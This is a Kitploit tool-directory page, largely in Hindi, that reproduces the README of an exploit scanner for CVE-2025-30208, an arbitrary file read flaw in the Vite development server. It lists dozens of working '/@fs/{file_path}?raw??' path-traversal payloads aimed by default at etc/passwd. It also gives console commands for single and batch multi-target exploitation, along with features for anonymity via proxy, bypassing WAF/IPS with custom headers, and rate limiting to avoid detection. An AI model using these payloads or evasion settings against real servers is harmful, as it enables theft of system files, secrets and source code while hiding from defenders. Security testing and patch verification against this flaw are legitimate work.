Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 Vite विकास सर्वर (एक लोकप्रिय फ्रंटएंड बिल्ड टूल) में एक मध्यम-गंभीरता वाली मनमानी फ़ाइल पढ़ने की कमजोरी है। | Kitploit
उपकरण/GitHubGitHub/th-secforge/cve-2025-30208
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 Vite विकास सर्वर (एक लोकप्रिय फ्रंटएंड बिल्ड टूल) में एक मध्यम-गंभीरता वाली मनमानी फ़ाइल पढ़ने की कमजोरी है।

रिपॉजिटरी देखें
1441 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔥 CVE-2025-30208 Vite मनमानी फ़ाइल पढ़ने की भेद्यता स्कैनर

Python License Security Status Modular

CVE-2025-30208 के लिए उन्नत भेद्यता स्कैनर जिसमें एंटरप्राइज़-ग्रेड सुविधाएँ हैं

Vite मनमानी फ़ाइल पढ़ने की भेद्यता का पता लगाने के लिए पेशेवर पैठ परीक्षण उपकरण

🚀 त्वरित आरंभ • 📋 विशेषताएँ • 🔧 उपयोग • 📊 उदाहरण • 🛡️ सुरक्षा


📖 अवलोकन

यह एक व्यापक भेद्यता स्कैनर है जो Vite विकास सर्वरों में CVE-2025-30208 भेद्यता का पता लगाने और उसका शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता Vite के फ़ाइल सिस्टम एंडपॉइंट के माध्यम से मनमानी फ़ाइल पढ़ने की पहुँच प्रदान करती है, जिससे संभावित रूप से संवेदनशील कॉन्फ़िगरेशन फ़ाइलें, स्रोत कोड और सिस्टम जानकारी उजागर हो सकती है।

🎯 यह उपकरण क्या करता है

  • नेटवर्क में कमज़ोर Vite इंस्टेंस का पता लगाता है
  • मनमानी फ़ाइल पढ़ने की भेद्यता का सुरक्षित तरीके से शोषण करता है
  • संवेदनशील फ़ाइलों और कॉन्फ़िगरेशन डेटा की खोज करता है
  • कई प्रारूपों (HTML, JSON, कंसोल) में निष्कर्षों की रिपोर्ट करता है
  • स्कैनिंग सत्रों और कॉन्फ़िगरेशन का प्रबंधन करता है
  • स्वचालित पुनर्प्रयास तंत्र के साथ त्रुटियों को सहजता से संभालता है

🏗️ मॉड्यूलर आर्किटेक्चर

उपकरण में अब बेहतर रखरखाव और विस्तारशीलता के लिए मॉड्यूलर आर्किटेक्चर है:

  • CVE-2025-30208.py - मुख्य स्कैनर एप्लिकेशन
  • payloads.py - उन्नत शोषण पेलोड (60+ विविधताएँ)
  • sensitive_files.py - व्यापक संवेदनशील फ़ाइल डेटाबेस (200+ फ़ाइलें)
  • html_template.py - उन्नत हैकर-शैली HTML रिपोर्टिंग टेम्पलेट

🚀 त्वरित आरंभ

पूर्वापेक्षाएँ

pip3 install -r requirements.txt

मूल उपयोग

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 विशेषताएँ

🔍 मुख्य भेद्यता का पता लगाना

  • 60+ उन्नत पेलोड: अधिकतम पहचान के लिए व्यापक शोषण तकनीकें
  • स्मार्ट डिटेक्शन: गलत सकारात्मकता से बचने के लिए बुद्धिमान प्रतिक्रिया विश्लेषण
  • रीयल-टाइम सत्यापन: लक्ष्य प्रतिक्रियाओं का निरंतर सत्यापन
  • व्यापक परीक्षण: सभी ज्ञात कमज़ोर एंडपॉइंट का परीक्षण

🛡️ उन्नत सुरक्षा सुविधाएँ

  • प्रॉक्सी समर्थन: गुमनामी के लिए HTTP/HTTPS प्रॉक्सी कॉन्फ़िगरेशन
  • कस्टम हेडर: कस्टम HTTP हेडर के साथ WAF/IPS को बायपास करें
  • दर सीमित करना: पता लगाने से बचने के लिए कॉन्फ़िगर करने योग्य विलंब
  • सत्र प्रबंधन: स्कैनिंग सत्रों को सहेजें और पुनर्स्थापित करें
  • इनपुट सत्यापन: व्यापक पैरामीटर सत्यापन

🔧 उन्नत क्षमताएँ

  • बैच स्कैनिंग: कई लक्ष्यों की मल्टी-थ्रेडेड स्कैनिंग
  • संवेदनशील फ़ाइल खोज: 200+ संवेदनशील फ़ाइलों की स्वचालित खोज
  • कनेक्टिविटी परीक्षण: TCP/UDP/HTTP/HTTPS प्रोटोकॉल परीक्षण
  • त्रुटि पुनर्प्राप्ति: एक्सपोनेंशियल बैकऑफ़ के साथ स्वचालित पुनर्प्रयास
  • व्यापक लॉगिंग: टाइमस्टैम्प के साथ विस्तृत लॉग

📊 रिपोर्टिंग और आउटपुट

  • 🎨 उन्नत HTML रिपोर्ट: एनिमेशन के साथ सुंदर हैकर-शैली भेद्यता रिपोर्ट
  • JSON निर्यात: आगे के विश्लेषण के लिए संरचित डेटा
  • कंसोल आउटपुट: रंग-कोडित रीयल-टाइम फीडबैक
  • लॉग फ़ाइलें: विस्तृत ऑडिट ट्रेल
  • इंटरैक्टिव वेब इंटरफ़ेस: रिपोर्ट देखने के लिए अंतर्निहित वेब सर्वर

🔧 उपयोग गाइड

1. मूल कॉन्फ़िगरेशन

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. भेद्यता परीक्षण

CVE-2025-30208 > run

# विस्तृत आउटपुट के लिए वर्बोज़ मोड सक्षम करें
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. बैच स्कैनिंग

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[समाप्त करने के लिए Enter दो बार दबाएँ]

4. संवेदनशील फ़ाइल खोज

CVE-2025-30208 > scan

5. उन्नत कॉन्फ़िगरेशन

# प्रॉक्सी कॉन्फ़िगर करें
CVE-2025-30208 > proxy
प्रॉक्सी दर्ज करें: http://127.0.0.1:8080

# कस्टम हेडर सेट करें
CVE-2025-30208 > headers
हेडर दर्ज करें: {"User-Agent": "Custom Scanner"}

# दर सीमित करना कॉन्फ़िगर करें
CVE-2025-30208 > rate
दर सीमा दर्ज करें: 1.0

6. उन्नत HTML रिपोर्टिंग

# सुंदर HTML रिपोर्ट जनरेट करें
CVE-2025-30208 > pull

# रिपोर्ट देखने के लिए वेब सर्वर शुरू करें
CVE-2025-30208 > web

# विशिष्ट पोर्ट पर वेब सर्वर शुरू करें
CVE-2025-30208 > web 8081

# वेब सर्वर बंद करें
CVE-2025-30208 > web off

📊 कमांड संदर्भ

कमांडविवरणउदाहरण
set <option> <value>कॉन्फ़िगरेशन विकल्प सेट करेंset RHOST 192.168.1.100
show optionsवर्तमान सेटिंग्स प्रदर्शित करेंshow options
editइंटरैक्टिव विकल्प संपादकedit
run / exploitभेद्यता परीक्षण चलाएँrun
batchएकाधिक लक्ष्यों की बैच स्कैनिंगbatch
scanसंवेदनशील फ़ाइलों की खोजscan
pullपरिणाम HTML/JSON में निर्यात करेंpull
web [on|off|port]HTML रिपोर्ट के लिए वेब सर्वरweb 8080
saveसत्र कॉन्फ़िगरेशन सहेजेंsave
loadसत्र कॉन्फ़िगरेशन लोड करेंload
testलक्ष्य से कनेक्टिविटी का परीक्षण करेंtest
validateवर्तमान कॉन्फ़िगरेशन मान्य करेंvalidate
verboseवर्बोज़ मोड टॉगल करेंverbose
proxyप्रॉक्सी सेटिंग्स कॉन्फ़िगर करेंproxy
headersकस्टम HTTP हेडर सेट करेंheaders
rateदर सीमित करना कॉन्फ़िगर करेंrate
logलॉगिंग जानकारी दिखाएँlog
help / ?सहायता दिखाएँhelp
exit / quitउपकरण से बाहर निकलेंexit

⚙️ कॉन्फ़िगरेशन विकल्प

विकल्पविवरणडिफ़ॉल्टसत्यापन
RHOSTलक्ष्य होस्ट/IP पता-होस्टनाम/IP सत्यापन
RPORTलक्ष्य पोर्ट संख्या-पोर्ट रेंज (1-65535)
FILEPATHपरीक्षण करने के लिए फ़ाइल पथetc/passwdपथ सत्यापन
PROXYHTTP/HTTPS प्रॉक्सी URL-URL प्रारूप सत्यापन
VERBOSEवर्बोज़ आउटपुट सक्षम करेंfalseबूलियन सत्यापन
RATE_LIMITअनुरोधों के बीच विलंब (सेकंड)0.3संख्यात्मक सत्यापन
THREADSबैच स्कैनिंग के लिए थ्रेड्स की संख्या5पूर्णांक सत्यापन
TIMEOUTअनुरोध टाइमआउट (सेकंड)5पूर्णांक सत्यापन
CUSTOM_HEADERSकस्टम HTTP हेडर (JSON){}JSON प्रारूप सत्यापन

🎨 उन्नत पेलोड सिस्टम

स्कैनर अब payloads.py में संगठित 60+ विभिन्न पेलोड विविधताओं का उपयोग करता है:

प्राथमिक @fs पेलोड

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

विस्तारित पैरामीटर विविधताएँ

/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite-विशिष्ट विविधताएँ

/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

मॉड्यूल सिस्टम विविधताएँ

/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

वैकल्पिक एंडपॉइंट

/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 उन्नत संवेदनशील फ़ाइल खोज

उपकरण अब sensitive_files.py में संगठित 200+ संवेदनशील फ़ाइलों का परीक्षण करता है:

टूल डाउनलोड करें